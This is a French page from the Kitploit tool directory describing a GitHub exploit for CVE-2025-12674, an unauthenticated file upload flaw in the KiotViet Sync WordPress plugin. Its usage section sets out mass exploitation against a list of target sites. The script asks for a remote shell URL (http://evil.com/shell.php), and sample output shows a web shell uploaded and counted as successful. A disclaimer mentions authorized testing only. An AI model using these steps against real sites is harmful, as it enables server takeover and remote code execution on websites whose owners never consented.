Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-12674 — KiotViet Sync <= 1.8.5 - Téléchargement arbitraire de fichiers sans authentification | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-12674
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubnxploited/cve-2025-12674

CVE-2025-12674

KiotViet Sync <= 1.8.5 - Téléchargement arbitraire de fichiers sans authentification

Voir le dépôt
21il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-12674

KiotViet Sync <= 1.8.5 - Téléchargement arbitraire de fichier non authentifié

🐚 KiotViet Sync <= 1.8.5 - Téléchargement arbitraire de fichier non authentifié


📝 Description

Le plugin KiotViet Sync pour WordPress (versions jusqu'à et y compris 1.8.5) est vulnérable aux téléchargements arbitraires de fichiers, en raison d'une validation manquante du type de fichier dans la fonction create_media().
Cette vulnérabilité permet à des attaquants non authentifiés de télécharger des fichiers arbitraires sur le serveur, ce qui peut conduire à une exécution de code à distance.

  • CVE: CVE-2025-12674
  • CVSS: 9.8 (Critique)

🚀 Utilisation

  1. Clonez ce dépôt, ou téléchargez le script.

  2. Préparez vos cibles :
    Placez une cible par ligne dans un fichier nommé .

list.txt
root@kitploit:~
example.com
site2.com
http://site3.com
  • Exécutez le script d'exploitation :
    Le nom du script est :

    root@kitploit:~
    CVE-2025-12674.py
    
    root@kitploit:~
    python3 CVE-2025-12674.py
    
  • Lorsque vous y êtes invité, saisissez vos options :

    root@kitploit:~
    Enter targets file name (default: list.txt): list.txt
    Enter number of threads (default: 10): 
    Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ Loaded 1 targets. Threads: 10.                                                                                           │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ http://nxk.ddev.site                                                                                                     │
    │ Trying KiotViet exploit...                                                                                               │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
    ║ ✔ Shell uploaded!                                                                                                        ║
    ║ Check here:                                                                                                              ║
    ║ http://nxk.ddev.site/wp-content/uploads/2026/01/                                                                         ║
    ║                                                                                                                          ║
    ╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
               Summary           
                                 
      Metric              Value  
     ─────────────────────────── 
      Total attempts          1  
      Successful shells       1  
      Failed attempts         0  
    
    • Le répertoire de sortie pour le shell téléchargé n'affiche pas le nom du fichier (car il est généré dynamiquement).

    📂 Sortie

    • Tous les chemins de shell réussis sont enregistrés dans shells.txt.
    • Des copies de sauvegarde de la sortie sont automatiquement créées avec des horodatages.

    ⚠️ Avertissement

    Ce script est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.
    L'utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite est illégale et contraire à l'éthique.
    L'auteur décline toute responsabilité en cas d'utilisation abusive ou de tout dommage causé.


    👤 Auteur

    Nxploited (Khaled Alenazi)

    Télécharger l’outil